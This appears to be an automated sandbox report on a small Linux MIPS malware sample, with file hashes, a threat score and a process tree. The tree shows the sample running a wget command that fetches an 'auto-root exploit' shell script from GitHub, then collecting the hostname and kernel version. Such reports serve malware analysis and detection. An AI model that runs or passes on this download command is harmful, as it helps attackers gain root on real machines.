Analysis

  • max time kernel
    2s
  • max time network
    3s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240418-en
  • resource tags

    arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
  • submitted
    18-09-2024 04:59

General

  • Target

    e8609b5fe37bbc37ac72c127ab2a94e9_JaffaCakes118

  • Size

    12KB

  • MD5

    e8609b5fe37bbc37ac72c127ab2a94e9

  • SHA1

    5cdbb385ff43a45b8da48208592031b0d211f17f

  • SHA256

    873fe8f1464c6e7a7f74ab8c1ea3c356a029d43a7a6a9de8eb5c887937234d11

  • SHA512

    0467c2fbaf0bee085fab4a12bd95d42db0fc9d0e88b79e5616799451fd4822d7bc878a4d319b64fcefe6cecac7b3507e5db3955d182a03368712f5e14742850c

  • SSDEEP

    384:9MjVCXEXuK/WZDgD8AapX8XCkLWkWKzPKplKsNemW84mkXm+roosjh5oBq:xXEXeZDgD8AapX8XdLWk1zoIweb84mkU

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)

Processes

  • /tmp/e8609b5fe37bbc37ac72c127ab2a94e9_JaffaCakes118
    /tmp/e8609b5fe37bbc37ac72c127ab2a94e9_JaffaCakes118
    1⤵
      PID:709
      • /usr/bin/clear
        clear
        2⤵
          PID:712
        • /bin/ping
          ping -c 1 raw.githubusercontent.com -i 1000
          2⤵
            PID:715
          • /usr/bin/wget
            wget https://raw.githubusercontent.com/nilotpalbiswas/Auto-Root-Exploit/master/autoroot.sh "--timeout=5" -q -O -
            2⤵
              PID:724
            • /bin/grep
              grep "ver="
              2⤵
                PID:725
              • /usr/bin/cut
                cut "-d=" -f2
                2⤵
                  PID:726
                • /usr/bin/cut
                  cut "-d " -f1
                  2⤵
                    PID:741
                  • /bin/hostname
                    hostname
                    2⤵
                      PID:743
                    • /bin/uname
                      uname -r
                      2⤵
                        PID:745

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /root/.wget-hsts

    Filesize

    180B

    MD5

    ceb7eddc1edcc8ab43e023863cc74567

    SHA1

    d1b57ebace5bbd41b9b751010d56723552505ab6

    SHA256

    3967eaab271a9bb1b0237ee5dbd6d412cc1b7a3d97dcc1a58258df26d963d104

    SHA512

    a9d78bf6cf64055b9e3b05514733d07e0b678564ac54ac1b7dd1bcd9661799e64b7c2f6fd646fa395aed65a22a9d811600b796d2bfbe2c1b7624524cf94bad48